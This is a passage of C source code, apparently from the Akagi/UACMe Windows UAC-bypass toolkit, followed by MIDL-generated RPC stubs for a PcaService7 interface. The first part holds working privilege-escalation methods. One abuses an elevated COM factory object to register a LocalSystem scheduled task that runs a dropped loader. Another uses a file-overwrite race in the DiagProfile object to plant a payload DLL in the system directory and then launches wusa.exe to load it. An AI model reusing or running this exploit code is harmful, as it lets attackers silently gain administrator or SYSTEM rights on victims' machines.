if (SUCCEEDED(pRunningTask->lpVtbl->get_State(pRunningTask, &taskState))) {
if (taskState == TASK_STATE_RUNNING) {
Sleep(5000);
}
}
pRunningTask->lpVtbl->Stop(pRunningTask);
pTaskFolder->lpVtbl->DeleteTask(pTaskFolder, bstrTaskName, 0);
} while (FALSE);
if (bstrTaskFolder)
SysFreeString(bstrTaskFolder);
if (bstrTaskName)
SysFreeString(bstrTaskName);
if (pRunningTask)
pRunningTask->lpVtbl->Release(pRunningTask);
if (pTask)
pTask->lpVtbl->Release(pTask);
if (pTaskFolder)
pTaskFolder->lpVtbl->Release(pTaskFolder);
return SUCCEEDED(r);
}
BSTR ucmxBuildParametersForTask(
_In_ LPCWSTR lpLoader,
_In_ SIZE_T cbLoader
)
{
BSTR bstrResult = NULL;
SIZE_T sz;
PVOID workBuffer, offsetPtr;
sz = cbLoader +
sizeof(g_encodedTaskParamBegin) +
sizeof(g_encodedTaskParamEnd);
workBuffer = (PWCH)supHeapAlloc(sz);
if (workBuffer) {
offsetPtr = workBuffer;
RtlCopyMemory(offsetPtr, g_encodedTaskParamBegin, sizeof(g_encodedTaskParamBegin));
EncodeBuffer(offsetPtr, sizeof(g_encodedTaskParamBegin), AKAGI_XOR_KEY2);
offsetPtr = RtlOffsetToPointer(offsetPtr, sizeof(g_encodedTaskParamBegin));
RtlCopyMemory(offsetPtr, lpLoader, cbLoader);
offsetPtr = RtlOffsetToPointer(offsetPtr, cbLoader);
RtlCopyMemory(offsetPtr, g_encodedTaskParamEnd, sizeof(g_encodedTaskParamEnd));
EncodeBuffer(offsetPtr, sizeof(g_encodedTaskParamEnd), AKAGI_XOR_KEY2);
bstrResult = SysAllocString(workBuffer);
supHeapFree(workBuffer);
}
return bstrResult;
}
/*
* ucmVFServerTaskSchedMethod
*
* Purpose:
*
* Bypass UAC by using Elevated Factory Server COM object.
*
* 1. Allocate Elevated Factory Server COM object and produce with it help Task Scheduler object.
* 2. Use Task Scheduler object to register task running as LocalSystem.
*
*/
NTSTATUS ucmVFServerTaskSchedMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
BOOL bNeedCleanup = FALSE;
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HRESULT hr_init;
IElevatedFactoryServer* pElevatedServer = NULL;
ITaskService* pTaskService = NULL;
BSTR bstrXml = NULL;
WCHAR szLoaderFileName[MAX_PATH * 2];
ucmConsolePrint(TEXT("[+] Entering ucmVFServerTaskSchedMethod\r\n"));
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
//
// Write loader to the %temp%
//
if (!supReplaceDllEntryPoint(
ProxyDll,
ProxyDllSize,
AKATSUKI_ENTRYPOINT_EXE,
TRUE))
{
break;
}
RtlSecureZeroMemory(&szLoaderFileName, sizeof(szLoaderFileName));
_strcpy(szLoaderFileName, g_ctx->szTempDirectory);
_strcat(szLoaderFileName, THEOLDNEWTHING);
_strcat(szLoaderFileName, TEXT(".exe"));
bNeedCleanup = supWriteBufferToFile(szLoaderFileName, ProxyDll, ProxyDllSize);
if (!bNeedCleanup)
break;
bstrXml = ucmxBuildParametersForTask(szLoaderFileName, _strlen(szLoaderFileName) * sizeof(WCHAR));
if (bstrXml == NULL)
break;
if (!ucmxGetElevatedFactoryServerAndTaskService(&pElevatedServer, &pTaskService))
break;
if (ucmxRegisterAndRunTask(pTaskService, bstrXml))
MethodResult = STATUS_SUCCESS;
} while (FALSE);
if (bstrXml)
SysFreeString(bstrXml);
if (pElevatedServer != NULL) {
pElevatedServer->lpVtbl->Release(pElevatedServer);
}
if (pTaskService) {
pTaskService->lpVtbl->Release(pTaskService);
}
if (SUCCEEDED(hr_init))
CoUninitialize();
if (bNeedCleanup)
DeleteFile(szLoaderFileName);
return MethodResult;
}
typedef struct _UCMX_OVP {
PVOID ProxyDll;
DWORD ProxyDllSize;
WCHAR TargetFile[MAX_PATH * 2]; //%temp%\hui32\results.cab
} UCMX_OVP, * PUCMX_OVP;
HANDLE OverwriteThreadHandle = NULL;
LONG TerminateOverwriteThread = FALSE;
/*
* ucmxOverwriteThread
*
* Purpose:
*
* Thread for race condition, continuously overwrite diagprofile results.cab file with the payload.
*
*/
DWORD ucmxOverwriteThread(
_In_ PVOID Parameter)
{
UCMX_OVP params;
HANDLE hTargetFile;
DWORD bytesIO;
RtlCopyMemory(¶ms, Parameter, sizeof(UCMX_OVP));
while (TRUE) {
if (TerminateOverwriteThread) {
break;
}
hTargetFile = CreateFile(params.TargetFile,
GENERIC_WRITE,
FILE_SHARE_VALID_FLAGS,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hTargetFile != INVALID_HANDLE_VALUE) {
WriteFile(hTargetFile, params.ProxyDll, params.ProxyDllSize, &bytesIO, NULL);
CloseHandle(hTargetFile);
}
}
supHeapFree(Parameter);
CloseHandle(OverwriteThreadHandle);
OverwriteThreadHandle = NULL;
return 0;
}
/*
* ucmxTriggerDiagProfile
*
* Purpose:
*
* Allocate elevated diag profile object and call SaveDirectoryAsCab method.
*
*/
HRESULT ucmxTriggerDiagProfile(
_In_ LPCWSTR lpDirectory
)
{
HRESULT r = E_FAIL;
IElevatedFactoryServer* pElevatedServer = NULL;
IUnknown* pUnknown = NULL;
IDispatch* pDispatch = NULL;
CLSID clsid;
DISPID dispid;
DISPPARAMS dispatchParams;
LPOLESTR methodName = NULL;
VARIANT result;
VARIANTARG values[2];
WCHAR szTarget[MAX_PATH * 2];
values[0].bstrVal = NULL;
values[1].bstrVal = NULL;
do {
methodName = SysAllocString(L"SaveDirectoryAsCab");
if (methodName == NULL)
break;
r = ucmxGetElevatedFactoryServerObject(
T_CLSID_VFServerDiagCpl,
(VOID**)&pElevatedServer);
if (r != S_OK)
break;
ucmConsolePrint(TEXT("[+] Elevated Factory Server object allocated\r\n"));
r = CLSIDFromString(T_CLSID_DiagnosticProfile, &clsid);
if (r != S_OK)
break;
r = pElevatedServer->lpVtbl->ServerCreateElevatedObject(pElevatedServer,
&clsid,
&IID_IUnknown,
(void**)&pUnknown);
if (r != S_OK)
break;
ucmConsolePrint(TEXT("[+] Elevated DiagProfile object allocated\r\n"));
if (pUnknown == NULL) {
r = E_FAIL;
break;
}
r = pUnknown->lpVtbl->QueryInterface(pUnknown, &IID_IDispatch, (VOID**)&pDispatch);
if (r != S_OK)
break;
ucmConsolePrint(TEXT("[+] QueryInterface success\r\n"));
if (pDispatch == NULL) {
r = E_FAIL;
break;
}
r = pDispatch->lpVtbl->GetIDsOfNames(pDispatch, &IID_NULL, &methodName, 1, LOCALE_USER_DEFAULT, &dispid);
if (r != S_OK)
break;
ucmConsolePrint(TEXT("[+] Dispatch->GetIDsOfNames success\r\n"));
RtlSecureZeroMemory(&dispatchParams, sizeof(dispatchParams));
VariantInit(&values[0]);
VariantInit(&values[1]);
_strcpy(szTarget, g_ctx->szSystemDirectory);
_strcat(szTarget, WOW64LOG_DLL);
values[0].vt = VT_BSTR;
values[0].bstrVal = SysAllocString(szTarget);
if (values[0].bstrVal == NULL) {
r = E_OUTOFMEMORY;
break;
}
values[1].vt = VT_BSTR;
values[1].bstrVal = SysAllocString(lpDirectory);
if (values[1].bstrVal == NULL) {
r = E_OUTOFMEMORY;
break;
}
dispatchParams.cArgs = 2;
dispatchParams.rgvarg = values;
VariantInit(&result);
r = pDispatch->lpVtbl->Invoke(pDispatch,
dispid,
&IID_NULL,
LOCALE_USER_DEFAULT,
DISPATCH_METHOD,
&dispatchParams,
&result,
NULL,
NULL);
ucmConsolePrintValueUlong(TEXT("[+] Dispatch->Invoke"), r, TRUE);
VariantClear(&result);
} while (FALSE);
if (values[0].bstrVal) SysFreeString(values[0].bstrVal);
if (values[1].bstrVal) SysFreeString(values[1].bstrVal);
if (methodName)
SysFreeString((BSTR)methodName);
if (pDispatch) {
pDispatch->lpVtbl->Release(pDispatch);
}
if (pUnknown) {
pUnknown->lpVtbl->Release(pUnknown);
}
if (pElevatedServer != NULL) {
pElevatedServer->lpVtbl->Release(pElevatedServer);
}
return r;
}
/*
* ucmVFServerDiagProfileMethod
*
* Purpose:
*
* Bypass UAC by using Elevated Factory Server COM object.
*
* 1. Allocate Elevated Factory Server COM object and produce with it help Diag Profiler object.
* 2. Use Diag Profiler object to move files into protected area via race condition.
*
*/
NTSTATUS ucmVFServerDiagProfileMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
HRESULT hr_init, r;
DWORD dwLastError;
ULONG retryCount = 0;
UCMX_OVP* ovParams = NULL;
WCHAR szBuffer[MAX_PATH * 2];
ucmConsolePrint(TEXT("[+] Entering ucmVFServerDiagProfileMethod\r\n"));
hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
do {
//
// Create %temp%\hui32 directory.
//
_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, THEOLDNEWTHING);
if (!CreateDirectory((LPCWSTR)&szBuffer, NULL)) {
dwLastError = GetLastError();
if (dwLastError != ERROR_ALREADY_EXISTS) {
ucmConsolePrintValueUlong(TEXT("[!] Could not create directory\r\n"), dwLastError, TRUE);
break;
}
}
ovParams = (UCMX_OVP*)supHeapAlloc(sizeof(UCMX_OVP));
if (ovParams == NULL)
break;
ovParams->ProxyDll = ProxyDll;
ovParams->ProxyDllSize = ProxyDllSize;
_strcpy(ovParams->TargetFile, szBuffer);
supPathAddBackSlash(ovParams->TargetFile);
_strcat(ovParams->TargetFile, TEXT("results.cab"));
OverwriteThreadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxOverwriteThread, (PVOID)ovParams, 0, NULL);
if (OverwriteThreadHandle == NULL) {
ucmConsolePrintValueUlong(TEXT("[!] Cannot create worker thread\r\n"), GetLastError(), TRUE);
supHeapFree(ovParams);
break;
}
SetThreadPriority(OverwriteThreadHandle, THREAD_PRIORITY_TIME_CRITICAL);
r = ucmxTriggerDiagProfile(szBuffer);
if (FAILED(r)) {
ucmConsolePrintValueUlong(TEXT("[!] DiagProfile does not trigger\r\n"), r, TRUE);
break;
}
_InterlockedExchange((LONG*)&TerminateOverwriteThread, TRUE);
_strcpy(szBuffer, g_ctx->szSystemDirectory);
_strcat(szBuffer, WOW64LOG_DLL);
do {
if (PathFileExists(szBuffer)) {
ucmConsolePrint(TEXT("[+] Payload file installed\r\n"));
break;
}
else
Sleep(1000);
} while (++retryCount < 10);
_strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);
_strcat(szBuffer, SYSWOW64_DIR);
_strcat(szBuffer, WUSA_EXE);
if (supRunProcess2(szBuffer,
NULL,
NULL,
SW_HIDE,
5000))
{
ucmConsolePrint(TEXT("[+] Target executed\r\n"));
MethodResult = STATUS_SUCCESS;
}
} while (FALSE);
if (OverwriteThreadHandle) {
TerminateThread(OverwriteThreadHandle, 0);
CloseHandle(OverwriteThreadHandle);
OverwriteThreadHandle = NULL;
}
//
// Cleanup.
//
if (SUCCEEDED(hr_init))
CoUninitialize();
return MethodResult;
}
================================================
FILE: Source/Akagi/pcasvc/w7/pcasvc7.acf
================================================
[
explicit_handle
]
interface PcaService7
{
RAiNotifyUserCallbackExceptionProcess();
}
================================================
FILE: Source/Akagi/pcasvc/w7/pcasvc7.idl
================================================
[
uuid(0767a036-0d22-48aa-ba69-b619480f38cb),
version(1.0),
]
interface PcaService7
{
long RAiNotifyUserCallbackExceptionProcess(
handle_t bindingHandle,
[in][string] wchar_t* exePathName,
[in]long unknown0,
[in]long processId
);
}
================================================
FILE: Source/Akagi/pcasvc/w7/x64/pcasvc7_64.c
================================================
/*
File has been edited after MIDL compiler, changes:
1. XCFG BS removed
2. Warning supression added
3. See pcasvc7__MIDL_ProcFormatString definition "Modified" comment
*/
/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for pcasvc7.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#if defined(_M_AMD64)
#pragma warning( disable: 4049 ) /* more than 64k source lines */
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning( disable: 4211 ) /* redefine extern to static */
#pragma warning( disable: 4232 ) /* dllimport identity*/
#pragma warning( disable: 4024 ) /* array to pointer mapping*/
#include
#include "pcasvc7_64.h"
#define TYPE_FORMAT_STRING_SIZE 7
#define PROC_FORMAT_STRING_SIZE 55
#define EXPR_FORMAT_STRING_SIZE 1
#define TRANSMIT_AS_TABLE_SIZE 0
#define WIRE_MARSHAL_TABLE_SIZE 0
typedef struct _pcasvc7_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];
} pcasvc7_MIDL_TYPE_FORMAT_STRING;
typedef struct _pcasvc7_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[ PROC_FORMAT_STRING_SIZE ];
} pcasvc7_MIDL_PROC_FORMAT_STRING;
typedef struct _pcasvc7_MIDL_EXPR_FORMAT_STRING
{
long Pad;
unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];
} pcasvc7_MIDL_EXPR_FORMAT_STRING;
static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax =
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};
extern const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString;
extern const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString;
extern const pcasvc7_MIDL_EXPR_FORMAT_STRING pcasvc7__MIDL_ExprFormatString;
#define GENERIC_BINDING_TABLE_SIZE 0
/* Standard interface: PcaService7, ver. 1.0,
GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */
static const RPC_CLIENT_INTERFACE PcaService7___RpcClientInterface =
{
sizeof(RPC_CLIENT_INTERFACE),
{{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
0,
0,
0,
0,
0,
0x00000000
};
RPC_IF_HANDLE PcaService7_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService7___RpcClientInterface;
extern const MIDL_STUB_DESC PcaService7_StubDesc;
static RPC_BINDING_HANDLE PcaService7__MIDL_AutoBindHandle;
long RAiNotifyUserCallbackExceptionProcess(
handle_t bindingHandle,
/* [string][in] */ wchar_t *exePathName,
/* [in] */ long unknown0,
/* [in] */ long processId)
{
CLIENT_CALL_RETURN _RetVal;
_RetVal = NdrClientCall2(
( PMIDL_STUB_DESC )&PcaService7_StubDesc,
(PFORMAT_STRING) &pcasvc7__MIDL_ProcFormatString.Format[0],
bindingHandle,
exePathName,
unknown0,
processId);
return ( long )_RetVal.Simple;
}
#if !defined(__RPC_WIN64__)
#error Invalid build platform for this stub.
#endif
static const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString =
{
0,
{
/* Procedure RAiNotifyUserCallbackExceptionProcess */
0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x4 ), /* 4 */ /* N.B. Modified */
/* 8 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */
/* 14 */ NdrFcShort( 0x10 ), /* 16 */
/* 16 */ NdrFcShort( 0x8 ), /* 8 */
/* 18 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */
0x4, /* 4 */
/* 20 */ 0xa, /* 10 */
0x1, /* Ext Flags: new corr desc, */
/* 22 */ NdrFcShort( 0x0 ), /* 0 */
/* 24 */ NdrFcShort( 0x0 ), /* 0 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* 28 */ NdrFcShort( 0x0 ), /* 0 */
/* Parameter exePathName */
/* 30 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */
/* 34 */ NdrFcShort( 0x4 ), /* Type Offset=4 */
/* Parameter unknown0 */
/* 36 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 40 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter processId */
/* 42 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */
/* 46 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Return value */
/* 48 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 50 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */
/* 52 */ 0x8, /* FC_LONG */
0x0, /* 0 */
0x0
}
};
static const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString =
{
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x11, 0x8, /* FC_RP [simple_pointer] */
/* 4 */
0x25, /* FC_C_WSTRING */
0x5c, /* FC_PAD */
0x0
}
};
static const unsigned short PcaService7_FormatStringOffsetTable[] =
{
0
};
static const MIDL_STUB_DESC PcaService7_StubDesc =
{
(void *)& PcaService7___RpcClientInterface,
MIDL_user_allocate,
MIDL_user_free,
&PcaService7__MIDL_AutoBindHandle,
0,
0,
0,
0,
pcasvc7__MIDL_TypeFormatString.Format,
1, /* -error bounds_check flag */
0x50002, /* Ndr library version */
0,
0x8010272, /* MIDL Version 8.1.626 */
0,
0,
0, /* notify & notify_flag routine table */
0x1, /* MIDL flag */
0, /* cs routines */
0, /* proxy/server info */
0
};
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif
#else
#pragma warning(disable:4206)
#endif /* defined(_M_AMD64)*/
================================================
FILE: Source/Akagi/pcasvc/w7/x64/pcasvc7_64.h
================================================
/* this ALWAYS GENERATED file contains the definitions for the interfaces */
/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for pcasvc7.idl:
Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#pragma warning( disable: 4049 ) /* more than 64k source lines */
/* verify that the version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of
#endif /* __RPCNDR_H_VERSION__ */
#ifndef __pcasvc7_64_h__
#define __pcasvc7_64_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
#ifndef DECLSPEC_XFGVIRT
#if _CONTROL_FLOW_GUARD_XFG
#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))
#else
#define DECLSPEC_XFGVIRT(base, func)
#endif
#endif
/* Forward Declarations */
#ifdef __cplusplus
extern "C"{
#endif
#ifndef __PcaService7_INTERFACE_DEFINED__
#define __PcaService7_INTERFACE_DEFINED__
/* interface PcaService7 */
/* [explicit_handle][version][uuid] */
long RAiNotifyUserCallbackExceptionProcess(
handle_t bindingHandle,
/* [string][in] */ wchar_t *exePathName,
/* [in] */ long unknown0,
/* [in] */ long processId);
extern RPC_IF_HANDLE PcaService7_v1_0_c_ifspec;
extern RPC_IF_HANDLE PcaService7_v1_0_s_ifspec;
#endif /* __PcaService7_INTERFACE_DEFINED__ */
/* Additional Prototypes for ALL interfaces */
/* end of Additional Prototypes */
#ifdef __cplusplus
}
#endif
#endif
================================================
FILE: Source/Akagi/pcasvc/w7/x86-32/pcasvc7_32.c
================================================
/*
File has been edited after MIDL compiler, changes:
1. XCFG BS removed
2. Warning supression added
3. See pcasvc7__MIDL_ProcFormatString definition "Modified" comment
*/
/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for pcasvc7.idl:
Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#if !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_)
#pragma warning( disable: 4049 ) /* more than 64k source lines */
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning( disable: 4211 ) /* redefine extern to static */
#pragma warning( disable: 4232 ) /* dllimport identity*/
#pragma warning( disable: 4024 ) /* array to pointer mapping*/
#pragma warning( disable: 4100 ) /* unreferenced arguments in x86 call */
#pragma optimize("", off )
#include
#include "pcasvc7_32.h"
#define TYPE_FORMAT_STRING_SIZE 7
#define PROC_FORMAT_STRING_SIZE 53
#define EXPR_FORMAT_STRING_SIZE 1
#define TRANSMIT_AS_TABLE_SIZE 0
#define WIRE_MARSHAL_TABLE_SIZE 0
typedef struct _pcasvc7_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[ TYPE_FORMAT_STRING_SIZE ];
} pcasvc7_MIDL_TYPE_FORMAT_STRING;
typedef struct _pcasvc7_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[ PROC_FORMAT_STRING_SIZE ];
} pcasvc7_MIDL_PROC_FORMAT_STRING;
typedef struct _pcasvc7_MIDL_EXPR_FORMAT_STRING
{
long Pad;
unsigned char Format[ EXPR_FORMAT_STRING_SIZE ];
} pcasvc7_MIDL_EXPR_FORMAT_STRING;
static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax =
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};
extern const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString;
extern const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString;
extern const pcasvc7_MIDL_EXPR_FORMAT_STRING pcasvc7__MIDL_ExprFormatString;
#define GENERIC_BINDING_TABLE_SIZE 0
/* Standard interface: PcaService7, ver. 1.0,
GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */
static const RPC_CLIENT_INTERFACE PcaService7___RpcClientInterface =
{
sizeof(RPC_CLIENT_INTERFACE),
{{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},
{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},
0,
0,
0,
0,
0,
0x00000000
};
RPC_IF_HANDLE PcaService7_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService7___RpcClientInterface;
extern const MIDL_STUB_DESC PcaService7_StubDesc;
static RPC_BINDING_HANDLE PcaService7__MIDL_AutoBindHandle;
long RAiNotifyUserCallbackExceptionProcess(
handle_t bindingHandle,
/* [string][in] */ wchar_t *exePathName,
/* [in] */ long unknown0,
/* [in] */ long processId)
{
CLIENT_CALL_RETURN _RetVal;
_RetVal = NdrClientCall2(
( PMIDL_STUB_DESC )&PcaService7_StubDesc,
(PFORMAT_STRING) &pcasvc7__MIDL_ProcFormatString.Format[0],
( unsigned char * )&bindingHandle);
return ( long )_RetVal.Simple;
}
#if !defined(__RPC_WIN32__)
#error Invalid build platform for this stub.
#endif
#if !(TARGET_IS_NT50_OR_LATER)
#error You need Windows 2000 or later to run this stub because it uses these features:
#error /robust command line switch.
#error However, your C/C++ compilation flags indicate you intend to run this app on earlier systems.
#error This app will fail with the RPC_X_WRONG_STUB_VERSION error.
#endif
static const pcasvc7_MIDL_PROC_FORMAT_STRING pcasvc7__MIDL_ProcFormatString =
{
0,
{
/* Procedure RAiNotifyUserCallbackExceptionProcess */
0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x4 ), /* 4 */
/* 8 */ NdrFcShort( 0x14 ), /* x86 Stack size/offset = 20 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x0 ), /* x86 Stack size/offset = 0 */
/* 14 */ NdrFcShort( 0x10 ), /* 16 */
/* 16 */ NdrFcShort( 0x8 ), /* 8 */
/* 18 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */
0x4, /* 4 */
/* 20 */ 0x8, /* 8 */
0x1, /* Ext Flags: new corr desc, */
/* 22 */ NdrFcShort( 0x0 ), /* 0 */
/* 24 */ NdrFcShort( 0x0 ), /* 0 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* Parameter exePathName */
/* 28 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 30 */ NdrFcShort( 0x4 ), /* x86 Stack size/offset = 4 */
/* 32 */ NdrFcShort( 0x4 ), /* Type Offset=4 */
/* Parameter unknown0 */
/* 34 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 36 */ NdrFcShort( 0x8 ), /* x86 Stack size/offset = 8 */
/* 38 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter processId */
/* 40 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 42 */ NdrFcShort( 0xc ), /* x86 Stack size/offset = 12 */
/* 44 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Return value */
/* 46 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 48 */ NdrFcShort( 0x10 ), /* x86 Stack size/offset = 16 */
/* 50 */ 0x8, /* FC_LONG */
0x0, /* 0 */
0x0
}
};
static const pcasvc7_MIDL_TYPE_FORMAT_STRING pcasvc7__MIDL_TypeFormatString =
{
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x11, 0x8, /* FC_RP [simple_pointer] */
/* 4 */
0x25, /* FC_C_WSTRING */
0x5c, /* FC_PAD */
0x0
}
};
static const unsigned short PcaService7_FormatStringOffsetTable[] =
{
0
};
static const MIDL_STUB_DESC PcaService7_StubDesc =
{
(void *)& PcaService7___RpcClientInterface,
MIDL_user_allocate,
MIDL_user_free,
&PcaService7__MIDL_AutoBindHandle,
0,
0,
0,
0,
pcasvc7__MIDL_TypeFormatString.Format,
1, /* -error bounds_check flag */
0x50002, /* Ndr library version */
0,
0x8010272, /* MIDL Version 8.1.626 */
0,
0,
0, /* notify & notify_flag routine table */
0x1, /* MIDL flag */
0, /* cs routines */
0, /* proxy/server info */
0
};
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif
#else
#pragma warning(disable:4206)
#endif /* !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_) */
================================================
FILE: Source/Akagi/pcasvc/w7/x86-32/pcasvc7_32.h
================================================
/* this ALWAYS GENERATED file contains the definitions for the interfaces */
/* File created by MIDL compiler version 8.01.0626 */
/* at Mon Jan 18 19:14:07 2038
*/
/* Compiler settings for pcasvc7.idl:
Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
#pragma warning( disable: 4049 ) /* more than 64k source lines */
/* verify that the version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of
#endif /* __RPCNDR_H_VERSION__ */
#ifndef __pcasvc7_32_h__
#define __pcasvc7_32_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
#ifndef DECLSPEC_XFGVIRT
#if _CONTROL_FLOW_GUARD_XFG
#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))
#else
#define DECLSPEC_XFGVIRT(base, func)
#endif
#endif
/* Forward Declarations */
#ifdef __cplusplus
extern "C"{
#endif
#ifndef __PcaService7_INTERFACE_DEFINED__
#define __PcaService7_INTERFACE_DEFINED__
/* interface PcaService7 */
/* [explicit_handle][version][uuid] */
long RAiNotifyUserCallbackExceptionProcess(
handle_t bindingHandle,
/* [string][in] */ wchar_t *exePathName,
/* [in] */ long unknown0,
/* [in] */ long processId);
extern RPC_IF_HANDLE PcaService7_v1_0_c_ifspec;
extern RPC_IF_HANDLE PcaService7_v1_0_s_ifspec;
